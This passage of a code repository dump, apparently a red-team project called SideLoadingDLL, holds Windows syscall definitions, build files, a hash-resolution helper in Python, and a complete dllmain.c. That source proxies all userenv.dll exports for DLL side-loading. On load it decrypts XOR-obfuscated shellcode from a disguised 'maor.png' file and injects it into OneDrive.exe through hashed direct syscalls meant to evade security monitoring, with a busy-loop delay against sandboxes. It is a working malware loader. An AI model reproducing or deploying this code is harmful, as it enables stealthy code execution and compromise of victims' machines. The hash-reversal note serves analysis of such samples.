    SystemExceptionInformation = 0x21,
    SystemCrashDumpStateInformation = 0x22,
    SystemKernelDebuggerInformation = 0x23,
    SystemContextSwitchInformation = 0x24,
    SystemRegistryQuotaInformation = 0x25,
    SystemExtendServiceTableInformation = 0x26,
    SystemPrioritySeperation = 0x27,
    SystemVerifierAddDriverInformation = 0x28,
    SystemVerifierRemoveDriverInformation = 0x29,
    SystemProcessorIdleInformation = 0x2a,
    SystemLegacyDriverInformation = 0x2b,
    SystemCurrentTimeZoneInformation = 0x2c,
    SystemLookasideInformation = 0x2d,
    SystemTimeSlipNotification = 0x2e,
    SystemSessionCreate = 0x2f,
    SystemSessionDetach = 0x30,
    SystemSessionInformation = 0x31,
    SystemRangeStartInformation = 0x32,
    SystemVerifierInformation = 0x33,
    SystemVerifierThunkExtend = 0x34,
    SystemSessionProcessInformation = 0x35,
    SystemLoadGdiDriverInSystemSpace = 0x36,
    SystemNumaProcessorMap = 0x37,
    SystemPrefetcherInformation = 0x38,
    SystemExtendedProcessInformation = 0x39,
    SystemRecommendedSharedDataAlignment = 0x3a,
    SystemComPlusPackage = 0x3b,
    SystemNumaAvailableMemory = 0x3c,
    SystemProcessorPowerInformation = 0x3d,
    SystemEmulationBasicInformation = 0x3e,
    SystemEmulationProcessorInformation = 0x3f,
    SystemExtendedHandleInformation = 0x40,
    SystemLostDelayedWriteInformation = 0x41,
    SystemBigPoolInformation = 0x42,
    SystemSessionPoolTagInformation = 0x43,
    SystemSessionMappedViewInformation = 0x44,
    SystemHotpatchInformation = 0x45,
    SystemObjectSecurityMode = 0x46,
    SystemWatchdogTimerHandler = 0x47,
    SystemWatchdogTimerInformation = 0x48,
    SystemLogicalProcessorInformation = 0x49,
    SystemWow64SharedInformationObsolete = 0x4a,
    SystemRegisterFirmwareTableInformationHandler = 0x4b,
    SystemFirmwareTableInformation = 0x4c,
    SystemModuleInformationEx = 0x4d,
    SystemVerifierTriageInformation = 0x4e,
    SystemSuperfetchInformation = 0x4f,
    SystemMemoryListInformation = 0x50,
    SystemFileCacheInformationEx = 0x51,
    SystemThreadPriorityClientIdInformation = 0x52,
    SystemProcessorIdleCycleTimeInformation = 0x53,
    SystemVerifierCancellationInformation = 0x54,
    SystemProcessorPowerInformationEx = 0x55,
    SystemRefTraceInformation = 0x56,
    SystemSpecialPoolInformation = 0x57,
    SystemProcessIdInformation = 0x58,
    SystemErrorPortInformation = 0x59,
    SystemBootEnvironmentInformation = 0x5a,
    SystemHypervisorInformation = 0x5b,
    SystemVerifierInformationEx = 0x5c,
    SystemTimeZoneInformation = 0x5d,
    SystemImageFileExecutionOptionsInformation = 0x5e,
    SystemCoverageInformation = 0x5f,
    SystemPrefetchPatchInformation = 0x60,
    SystemVerifierFaultsInformation = 0x61,
    SystemSystemPartitionInformation = 0x62,
    SystemSystemDiskInformation = 0x63,
    SystemProcessorPerformanceDistribution = 0x64,
    SystemNumaProximityNodeInformation = 0x65,
    SystemDynamicTimeZoneInformation = 0x66,
    SystemCodeIntegrityInformation = 0x67,
    SystemProcessorMicrocodeUpdateInformation = 0x68,
    SystemProcessorBrandString = 0x69,
    SystemVirtualAddressInformation = 0x6a,
    SystemLogicalProcessorAndGroupInformation = 0x6b,
    SystemProcessorCycleTimeInformation = 0x6c,
    SystemStoreInformation = 0x6d,
    SystemRegistryAppendString = 0x6e,
    SystemAitSamplingValue = 0x6f,
    SystemVhdBootInformation = 0x70,
    SystemCpuQuotaInformation = 0x71,
    SystemNativeBasicInformation = 0x72,
    SystemErrorPortTimeouts = 0x73,
    SystemLowPriorityIoInformation = 0x74,
    SystemBootEntropyInformation = 0x75,
    SystemVerifierCountersInformation = 0x76,
    SystemPagedPoolInformationEx = 0x77,
    SystemSystemPtesInformationEx = 0x78,
    SystemNodeDistanceInformation = 0x79,
    SystemAcpiAuditInformation = 0x7a,
    SystemBasicPerformanceInformation = 0x7b,
    SystemQueryPerformanceCounterInformation = 0x7c,
    SystemSessionBigPoolInformation = 0x7d,
    SystemBootGraphicsInformation = 0x7e,
    SystemScrubPhysicalMemoryInformation = 0x7f,
    SystemBadPageInformation = 0x80,
    SystemProcessorProfileControlArea = 0x81,
    SystemCombinePhysicalMemoryInformation = 0x82,
    SystemEntropyInterruptTimingInformation = 0x83,
    SystemConsoleInformation = 0x84,
    SystemPlatformBinaryInformation = 0x85,
    SystemThrottleNotificationInformation = 0x86,
    SystemHypervisorProcessorCountInformation = 0x87,
    SystemDeviceDataInformation = 0x88,
    SystemDeviceDataEnumerationInformation = 0x89,
    SystemMemoryTopologyInformation = 0x8a,
    SystemMemoryChannelInformation = 0x8b,
    SystemBootLogoInformation = 0x8c,
    SystemProcessorPerformanceInformationEx = 0x8d,
    SystemSpare0 = 0x8e,
    SystemSecureBootPolicyInformation = 0x8f,
    SystemPageFileInformationEx = 0x90,
    SystemSecureBootInformation = 0x91,
    SystemEntropyInterruptTimingRawInformation = 0x92,
    SystemPortableWorkspaceEfiLauncherInformation = 0x93,
    SystemFullProcessInformation = 0x94,
    SystemKernelDebuggerInformationEx = 0x95,
    SystemBootMetadataInformation = 0x96,
    SystemSoftRebootInformation = 0x97,
    SystemElamCertificateInformation = 0x98,
    SystemOfflineDumpConfigInformation = 0x99,
    SystemProcessorFeaturesInformation = 0x9a,
    SystemRegistryReconciliationInformation = 0x9b,
    MaxSystemInfoClass = 0x9c,
} SYSTEM_INFORMATION_CLASS;

typedef struct _CLIENT_ID {
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;

PVOID findNtDll(void);
WCHAR* toLower(WCHAR* str);

extern void PrepareSyscall(DWORD dwSyscallNr, PVOID dw64Gate);
extern DoSyscall();

DWORD getSyscall(DWORD crypted_hash, Syscall* pSyscall);

unsigned long djb2_unicode(const wchar_t* str);
unsigned long djb2(unsigned char* str);
unsigned long xor_hash(unsigned long hash);
int my_strcmp(const char* p1, const char* p2);
--------------------------------------------------------------------------------
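`findNtDll()` and `getSyscall()` never compare module or function names as strings: they hash each candidate with `djb2` and compare against a constant that was stored XORed with `HASH_KEY` (defined above as `0x41424344`). When triaging a sample built from this code, the first job is mapping those constants back to names. The Python below is an added example, not code from this repository: it ports `djb2()`/`djb2_unicode()` and `xor_hash()` and resolves a constant against a candidate list. It encodes one caveat a practitioner needs: the C hash runs in `unsigned long`, which is 32 bits under MSVC, so every step wraps mod 2^32; a port that omits the mask, or a build where `unsigned long` is 64 bits, produces different values and will never match. The candidate module list is constructed for the demonstration; the constant `0x6391f6a9` is the one `findNtDll()` uses.

```python
HASH_KEY = 0x41424344     # from RecycleGate.h
MASK32 = 0xFFFFFFFF       # unsigned long is 32 bits under MSVC, so the C hash wraps mod 2**32


def djb2(name, bits=32):
    """Port of djb2()/djb2_unicode() from RecycleGate.c. Both C versions feed the
    code-unit value of each character into h = h*33 + c, so for ASCII names the
    narrow and wide variants agree. `bits` models the width of unsigned long."""
    mask = (1 << bits) - 1
    h = 5381
    for ch in name:
        h = ((h << 5) + h + ord(ch)) & mask
    return h


def xor_hash(value):
    """Port of xor_hash(): the stored constants are the real hash XORed with HASH_KEY."""
    return value ^ HASH_KEY


def resolve(obfuscated, candidates):
    """Return the first candidate whose lowercased djb2 hash equals xor_hash(obfuscated),
    mirroring findNtDll(), which lowercases BaseDllName before hashing; None if no match."""
    wanted = xor_hash(obfuscated)
    for candidate in candidates:
        if djb2(candidate.lower()) == wanted:
            return candidate
    return None


# Constructed candidate list for the demonstration; the constant is the one findNtDll() compares against.
MODULE_CANDIDATES = ["kernel32.dll", "KERNELBASE.dll", "NTDLL.DLL", "user32.dll"]

if __name__ == "__main__":
    print(hex(xor_hash(0x6391F6A9)), "->", resolve(0x6391F6A9, MODULE_CANDIDATES))
    print("with a 64-bit unsigned long the hash would be", hex(djb2("ntdll.dll", bits=64)))
```

`xor_hash(0x6391F6A9)` is `0x22D3B5ED`, which is `djb2("ntdll.dll")` under 32-bit wrap, so `resolve()` returns the ntdll entry; the same constant resolves to nothing if the hash is computed at 64-bit width.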
/SideLoadingDLL/SideLoadingDLL/SideLoadingDLL.vcxproj:
--------------------------------------------------------------------------------
Debug
Win32

Release
Win32

Debug
x64

Release
x64

16.0
Win32Proj
{68e703a8-afb7-4e92-9841-c085c923af06}
userenvsyscalls
10.0

DynamicLibrary
true
v143
Unicode

DynamicLibrary
false
v143
true
Unicode

DynamicLibrary
true
v143
Unicode

DynamicLibrary
false
v143
true
Unicode

true

false

true

false

Level3
true
WIN32;_DEBUG;USERENVSYSCALLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
true
Use
pch.h

Windows
true
false

Level3
true
true
true
WIN32;NDEBUG;USERENVSYSCALLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
true
Use
pch.h

Windows
true
true
true
false

Level3
true
_DEBUG;USERENVSYSCALLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
true
NotUsing
pch.h

Windows
true
false

Level3
true
true
true
NDEBUG;USERENVSYSCALLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
true
NotUsing
pch.h

Windows
true
true
true
false

Document

--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/SideLoadingDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
37 |
38 | Source Files
39 |
40 |
41 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/SideLoadingDLL.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/dllmain.c:
--------------------------------------------------------------------------------
1 | // dllmain.c : Defines the entry point for the DLL application.
2 | #include "windows.h"
3 | #include "Defines.h"
4 | #include "RecycleGate.h"
5 | #include "stdio.h"
6 |
7 | #define STATUS_SUCCESS 0
8 |
9 | extern void PrepareSyscall(DWORD dwSyscallNr, PVOID dw64Gate);
10 | extern DoSyscall();
11 |
12 | #pragma comment(linker,"/export:AreThereVisibleLogoffScripts=C:\\windows\\system32\\userenv.AreThereVisibleLogoffScripts,@106")
13 | #pragma comment(linker,"/export:AreThereVisibleShutdownScripts=C:\\windows\\system32\\userenv.AreThereVisibleShutdownScripts,@107")
14 | #pragma comment(linker,"/export:CreateAppContainerProfile=C:\\windows\\system32\\userenv.CreateAppContainerProfile,@108")
15 | #pragma comment(linker,"/export:CreateEnvironmentBlock=C:\\windows\\system32\\userenv.CreateEnvironmentBlock,@109")
16 | #pragma comment(linker,"/export:CreateProfile=C:\\windows\\system32\\userenv.CreateProfile,@110")
17 | #pragma comment(linker,"/export:DeleteAppContainerProfile=C:\\windows\\system32\\userenv.DeleteAppContainerProfile,@111")
18 | #pragma comment(linker,"/export:DeleteProfileA=C:\\windows\\system32\\userenv.DeleteProfileA,@112")
19 | #pragma comment(linker,"/export:DeleteProfileW=C:\\windows\\system32\\userenv.DeleteProfileW,@113")
20 | #pragma comment(linker,"/export:DeriveAppContainerSidFromAppContainerName=C:\\windows\\system32\\userenv.DeriveAppContainerSidFromAppContainerName,@114")
21 | #pragma comment(linker,"/export:DeriveRestrictedAppContainerSidFromAppContainerSidAndRestrictedName=C:\\windows\\system32\\userenv.DeriveRestrictedAppContainerSidFromAppContainerSidAndRestrictedName,@115")
22 | #pragma comment(linker,"/export:DestroyEnvironmentBlock=C:\\windows\\system32\\userenv.DestroyEnvironmentBlock,@116")
23 | #pragma comment(linker,"/export:DllCanUnloadNow=C:\\windows\\system32\\userenv.DllCanUnloadNow,@117")
24 | #pragma comment(linker,"/export:DllGetClassObject=C:\\windows\\system32\\userenv.DllGetClassObject,@118")
25 | #pragma comment(linker,"/export:DllRegisterServer=C:\\windows\\system32\\userenv.DllRegisterServer,@119")
26 | #pragma comment(linker,"/export:DllUnregisterServer=C:\\windows\\system32\\userenv.DllUnregisterServer,@120")
27 | #pragma comment(linker,"/export:EnterCriticalPolicySection=C:\\windows\\system32\\userenv.EnterCriticalPolicySection,@121")
28 | #pragma comment(linker,"/export:ExpandEnvironmentStringsForUserA=C:\\windows\\system32\\userenv.ExpandEnvironmentStringsForUserA,@123")
29 | #pragma comment(linker,"/export:ExpandEnvironmentStringsForUserW=C:\\windows\\system32\\userenv.ExpandEnvironmentStringsForUserW,@124")
30 | #pragma comment(linker,"/export:ForceSyncFgPolicy=C:\\windows\\system32\\userenv.ForceSyncFgPolicy,@125")
31 | #pragma comment(linker,"/export:FreeGPOListA=C:\\windows\\system32\\userenv.FreeGPOListA,@126")
32 | #pragma comment(linker,"/export:FreeGPOListW=C:\\windows\\system32\\userenv.FreeGPOListW,@127")
33 | #pragma comment(linker,"/export:GenerateGPNotification=C:\\windows\\system32\\userenv.GenerateGPNotification,@128")
34 | #pragma comment(linker,"/export:GetAllUsersProfileDirectoryA=C:\\windows\\system32\\userenv.GetAllUsersProfileDirectoryA,@129")
35 | #pragma comment(linker,"/export:GetAllUsersProfileDirectoryW=C:\\windows\\system32\\userenv.GetAllUsersProfileDirectoryW,@130")
36 | #pragma comment(linker,"/export:GetAppContainerFolderPath=C:\\windows\\system32\\userenv.GetAppContainerFolderPath,@131")
37 | #pragma comment(linker,"/export:GetAppContainerRegistryLocation=C:\\windows\\system32\\userenv.GetAppContainerRegistryLocation,@132")
38 | #pragma comment(linker,"/export:GetAppliedGPOListA=C:\\windows\\system32\\userenv.GetAppliedGPOListA,@133")
39 | #pragma comment(linker,"/export:GetAppliedGPOListW=C:\\windows\\system32\\userenv.GetAppliedGPOListW,@134")
40 | #pragma comment(linker,"/export:GetDefaultUserProfileDirectoryA=C:\\windows\\system32\\userenv.GetDefaultUserProfileDirectoryA,@136")
41 | #pragma comment(linker,"/export:GetDefaultUserProfileDirectoryW=C:\\windows\\system32\\userenv.GetDefaultUserProfileDirectoryW,@138")
42 | #pragma comment(linker,"/export:GetGPOListA=C:\\windows\\system32\\userenv.GetGPOListA,@140")
43 | #pragma comment(linker,"/export:GetGPOListW=C:\\windows\\system32\\userenv.GetGPOListW,@141")
44 | #pragma comment(linker,"/export:GetNextFgPolicyRefreshInfo=C:\\windows\\system32\\userenv.GetNextFgPolicyRefreshInfo,@142")
45 | #pragma comment(linker,"/export:GetPreviousFgPolicyRefreshInfo=C:\\windows\\system32\\userenv.GetPreviousFgPolicyRefreshInfo,@143")
46 | #pragma comment(linker,"/export:GetProfileType=C:\\windows\\system32\\userenv.GetProfileType,@144")
47 | #pragma comment(linker,"/export:GetProfilesDirectoryA=C:\\windows\\system32\\userenv.GetProfilesDirectoryA,@145")
48 | #pragma comment(linker,"/export:GetProfilesDirectoryW=C:\\windows\\system32\\userenv.GetProfilesDirectoryW,@146")
49 | #pragma comment(linker,"/export:GetUserProfileDirectoryA=C:\\windows\\system32\\userenv.GetUserProfileDirectoryA,@147")
50 | #pragma comment(linker,"/export:GetUserProfileDirectoryW=C:\\windows\\system32\\userenv.GetUserProfileDirectoryW,@148")
51 | #pragma comment(linker,"/export:HasPolicyForegroundProcessingCompleted=C:\\windows\\system32\\userenv.HasPolicyForegroundProcessingCompleted,@149")
52 | #pragma comment(linker,"/export:LeaveCriticalPolicySection=C:\\windows\\system32\\userenv.LeaveCriticalPolicySection,@150")
53 | #pragma comment(linker,"/export:LoadProfileExtender=C:\\windows\\system32\\userenv.LoadProfileExtender,@151")
54 | #pragma comment(linker,"/export:LoadUserProfileA=C:\\windows\\system32\\userenv.LoadUserProfileA,@152")
55 | #pragma comment(linker,"/export:LoadUserProfileW=C:\\windows\\system32\\userenv.LoadUserProfileW,@153")
56 | #pragma comment(linker,"/export:ProcessGroupPolicyCompleted=C:\\windows\\system32\\userenv.ProcessGroupPolicyCompleted,@154")
57 | #pragma comment(linker,"/export:ProcessGroupPolicyCompletedEx=C:\\windows\\system32\\userenv.ProcessGroupPolicyCompletedEx,@155")
58 | #pragma comment(linker,"/export:RefreshPolicy=C:\\windows\\system32\\userenv.RefreshPolicy,@156")
59 | #pragma comment(linker,"/export:RefreshPolicyEx=C:\\windows\\system32\\userenv.RefreshPolicyEx,@157")
60 | #pragma comment(linker,"/export:RegisterGPNotification=C:\\windows\\system32\\userenv.RegisterGPNotification,@158")
61 | #pragma comment(linker,"/export:RsopAccessCheckByType=C:\\windows\\system32\\userenv.RsopAccessCheckByType,@159")
62 | #pragma comment(linker,"/export:RsopFileAccessCheck=C:\\windows\\system32\\userenv.RsopFileAccessCheck,@160")
63 | #pragma comment(linker,"/export:RsopLoggingEnabled=C:\\windows\\system32\\userenv.RsopLoggingEnabled,@105")
64 | #pragma comment(linker,"/export:RsopResetPolicySettingStatus=C:\\windows\\system32\\userenv.RsopResetPolicySettingStatus,@161")
65 | #pragma comment(linker,"/export:RsopSetPolicySettingStatus=C:\\windows\\system32\\userenv.RsopSetPolicySettingStatus,@162")
66 | #pragma comment(linker,"/export:UnloadProfileExtender=C:\\windows\\system32\\userenv.UnloadProfileExtender,@163")
67 | #pragma comment(linker,"/export:UnloadUserProfile=C:\\windows\\system32\\userenv.UnloadUserProfile,@164")
68 | #pragma comment(linker,"/export:UnregisterGPNotification=C:\\windows\\system32\\userenv.UnregisterGPNotification,@165")
69 | #pragma comment(linker,"/export:WaitForMachinePolicyForegroundProcessing=C:\\windows\\system32\\userenv.WaitForMachinePolicyForegroundProcessing,@166")
70 | #pragma comment(linker,"/export:WaitForUserPolicyForegroundProcessing=C:\\windows\\system32\\userenv.WaitForUserPolicyForegroundProcessing,@167")
71 |
72 | char key[] = "muisdfh78934hfn438sdnfjkv";
73 |
74 |
75 | void XOR(char* data, size_t data_len, char* key, size_t key_len) {
76 | int j;
77 |
78 | j = 0;
79 | for (int i = 0; i < data_len; i++) {
80 | if (j == key_len - 1) j = 0;
81 |
82 | data[i] = data[i] ^ key[j];
83 | j++;
84 | }
85 | }
86 |
87 | void sleep()
88 | {
89 | for (int i = 0; i <= 500000; i++)
90 | {
91 | for (int j = 2; j <= i / 2; j++)
92 | {
93 | if (i % j == 0)
94 | {
95 | break;
96 | }
97 | }
98 | }
99 | }
100 |
101 | HANDLE findTarget(char* target)
102 | {
103 | NTSTATUS status;
104 | PVOID buffer;
105 | PSYSTEM_PROCESS_INFO spi;
106 |
107 | buffer = VirtualAlloc(NULL, 1024 * 1024, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // We need to allocate a large buffer because the process list can be large.
108 |
109 | if (!buffer)
110 | {
111 | return -1;
112 | }
113 |
114 | spi = (PSYSTEM_PROCESS_INFO)buffer;
115 |
116 | Syscall sysNtQuerySystemInformation = { 0x00 };
117 | DWORD dwSuccess = FAIL;
118 |
119 | dwSuccess = getSyscall(0xaf0d30ec, &sysNtQuerySystemInformation);
120 | if (dwSuccess == FAIL)
121 | return 0x01;
122 |
123 | PrepareSyscall(sysNtQuerySystemInformation.dwSyscallNr, sysNtQuerySystemInformation.pRecycledGate);
124 | if (!NT_SUCCESS(status = DoSyscall(SystemProcessInformation, spi, 1024 * 1024, NULL)))
125 | {
126 | VirtualFree(buffer, 0, MEM_RELEASE);
127 | return -1;
128 | }
129 |
130 | while (spi->NextEntryOffset) // Loop over the list until we reach the last entry.
131 | {
132 | wchar_t pName[256];
133 | memset(pName, 0, sizeof(pName));
134 | WideCharToMultiByte(CP_ACP, 0, spi->ImageName.Buffer, spi->ImageName.Length, (LPSTR)pName, sizeof(pName), NULL, NULL);
135 |
136 | int result = my_strcmp(target, (char*)pName);
137 | if (!result) {
138 | HANDLE pid = (HANDLE)spi->ProcessId;
139 | VirtualFree(buffer, 0, MEM_RELEASE); // Free the allocated buffer.
140 | return pid;
141 | }
142 |
143 | spi = (PSYSTEM_PROCESS_INFO)((LPBYTE)spi + spi->NextEntryOffset); // Calculate the address of the next entry.
144 |
145 | }
146 | VirtualFree(buffer, 0, MEM_RELEASE); // Free the allocated buffer.
147 | return 0;
148 | }
149 |
150 |
151 | PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
152 | char* d = (char*)dest;
153 | char* s = (char*)src;
154 | if (d < s)
155 | while (len--)
156 | *d++ = *s++;
157 | else {
158 | char* lasts = s + (len - 1);
159 | char* lastd = d + (len - 1);
160 | while (len--)
161 | *lastd-- = *lasts--;
162 | }
163 | return dest;
164 | }
165 |
166 |
167 | int ProxyFunction()
168 | {
169 | HANDLE file = NULL;
170 | DWORD fileSize = NULL;
171 | DWORD bytesRead = NULL;
172 | LPVOID fileData = NULL;
173 |
174 | // Reading our encrypted shellcode
175 | file = CreateFileA("maor.png", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
176 | if (file == INVALID_HANDLE_VALUE) {
177 | return 1;
178 | }
179 | fileSize = GetFileSize(file, NULL);
180 | fileData = HeapAlloc(GetProcessHeap(), 0, fileSize);
181 | ReadFile(file, fileData, fileSize, &bytesRead, NULL);
182 | unsigned char* shellcode = (unsigned char*)fileData;
183 |
184 | HANDLE Entry = findTarget("OneDrive.exe"); // Targeting the OneDrive.exe process
185 | Syscall sysZwOpenProcess = { 0x0 };
186 | NTSTATUS dwSuccess = FAIL;
187 | HANDLE hProc = 0;
188 |
189 | dwSuccess = getSyscall(0xda1009c3, &sysZwOpenProcess);
190 | if (dwSuccess == FAIL)
191 | return 0x01;
192 |
193 | OBJECT_ATTRIBUTES oa;
194 | CLIENT_ID cid = { (HANDLE)Entry, NULL };
195 | InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL);
196 | PrepareSyscall(sysZwOpenProcess.dwSyscallNr, sysZwOpenProcess.pRecycledGate);
197 | DoSyscall(&hProc, PROCESS_ALL_ACCESS, &oa, &cid);
198 |
199 | if (hProc != NULL)
200 | {
201 | Syscall sysZwCreateSection = { 0x0 };
202 | Syscall sysNtMapViewOfSection = { 0x0 };
203 | Syscall sysNtCreateThreadEx = { 0x0 };
204 | Syscall sysNtResumeThread = { 0x0 };
205 | Syscall sysNtDelayExecution = { 0x0 };
206 |
207 | DWORD dwSuccess = FAIL;
208 | // Prepare the syscalls
209 | dwSuccess = getSyscall(0x6805b1fb, &sysZwCreateSection);
210 | if (dwSuccess == FAIL)
211 | return 0x01;
212 |
213 | dwSuccess = getSyscall(0x625d5a2e, &sysNtMapViewOfSection);
214 | if (dwSuccess == FAIL)
215 | return 0x01;
216 |
217 | dwSuccess = getSyscall(0x8a4e6274, &sysNtCreateThreadEx);
218 | if (dwSuccess == FAIL)
219 | return 0x01;
220 |
221 | dwSuccess = getSyscall(0x6d397e74, &sysNtResumeThread);
222 | if (dwSuccess == FAIL)
223 | return 0x01;
224 |
225 | SIZE_T shellcodeSize = fileSize;
226 | HANDLE hSection = NULL;
227 | NTSTATUS status = NULL;
228 | SIZE_T size = fileSize;
229 | LARGE_INTEGER sectionSize = { size };
230 | PVOID pLocalView = NULL, pRemoteView = NULL;
231 | int viewUnMap = 2;
232 |
233 | XOR((char*)shellcode, shellcodeSize, key, sizeof(key));
234 |
235 | PrepareSyscall(sysZwCreateSection.dwSyscallNr, sysZwCreateSection.pRecycledGate);
236 | if ((status = DoSyscall(&hSection, SECTION_ALL_ACCESS, NULL, (PLARGE_INTEGER)&sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) {
237 | return -1;
238 | }
239 |
240 |
241 | PrepareSyscall(sysNtMapViewOfSection.dwSyscallNr, sysNtMapViewOfSection.pRecycledGate);
242 | if ((status = DoSyscall(hSection, GetCurrentProcess(),
243 | &pLocalView, NULL, NULL, NULL,
244 | (PULONG)&size, (SECTION_INHERIT)viewUnMap, NULL, PAGE_READWRITE)) != STATUS_SUCCESS) {
245 | return -1;
246 | }
247 |
248 |
249 | VxMoveMemory(pLocalView, shellcode, shellcodeSize);
250 |
251 | PrepareSyscall(sysNtMapViewOfSection.dwSyscallNr, sysNtMapViewOfSection.pRecycledGate);
252 | if ((status = DoSyscall(hSection, hProc, &pRemoteView, NULL, NULL, NULL,
253 | (PULONG)&size, (SECTION_INHERIT)viewUnMap, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) {
254 | return -1;
255 | }
256 |
257 |
258 | HANDLE hHostThread = INVALID_HANDLE_VALUE;
259 | PrepareSyscall(sysNtCreateThreadEx.dwSyscallNr, sysNtCreateThreadEx.pRecycledGate);
260 | if (( status = DoSyscall(&hHostThread, THREAD_ALL_ACCESS, &oa, hProc, (LPTHREAD_START_ROUTINE)pRemoteView, pRemoteView, FALSE, 0, 0, 0, NULL)) != STATUS_SUCCESS)
261 | {
262 | return -1;
263 | }
264 |
265 | PrepareSyscall(sysNtResumeThread.dwSyscallNr, sysNtResumeThread.pRecycledGate);
266 | DoSyscall(hHostThread);
267 | }
268 | return 0;
269 | }
270 |
271 |
272 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
273 | {
274 | switch (ul_reason_for_call)
275 | {
276 | case DLL_PROCESS_ATTACH:
277 | ProxyFunction();
278 | break;
279 | case DLL_THREAD_ATTACH:
280 | case DLL_THREAD_DETACH:
281 | case DLL_PROCESS_DETACH:
282 | break;
283 | }
284 | return TRUE;
285 | }
286 |
287 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/framework.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
4 | // Windows Header Files
5 | #include <windows.h>
6 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/GateTrampolin.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/GateTrampolin.obj
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/RecycleGate.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/RecycleGate.obj
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.Build.CppClean.log:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.dll.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | C:\Users\MaorPT\Desktop\Github\SideLoadingDLL\SideLoadingDLL\x64\Release\SideLoadingDLL.dll
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.iobj
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.ipdb
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.log:
--------------------------------------------------------------------------------
1 | C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v170\Microsoft.CppBuild.targets(510,5): warning MSB8028: The intermediate directory (x64\Release\) contains files shared from another project (userenv-syscalls.vcxproj). This can lead to incorrect clean and rebuild behavior.
2 | Assembling GateTrampolin.asm...
3 | dllmain.c
4 | C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\SideLoadingDLL\dllmain.c(135,42): warning C4311: 'type cast': pointer truncation from 'HANDLE' to 'int'
5 | C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\SideLoadingDLL\dllmain.c(189,35): warning C4312: 'type cast': conversion from 'int' to 'PVOID' of greater size
6 | C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\SideLoadingDLL\dllmain.c(185,35): warning C4244: 'initializing': conversion from 'SIZE_T' to 'DWORD', possible loss of data
7 | C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\SideLoadingDLL\dllmain.c(213,1): warning C4047: 'initializing': 'DWORD' differs in levels of indirection from 'void *'
8 | C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\SideLoadingDLL\dllmain.c(214,1): warning C4047: 'initializing': 'DWORD' differs in levels of indirection from 'void *'
9 | RecycleGate.c
10 | Previous IPDB not found, fall back to full compilation.
11 | dllmain.obj : warning LNK4104: export of symbol 'DllCanUnloadNow' should be PRIVATE
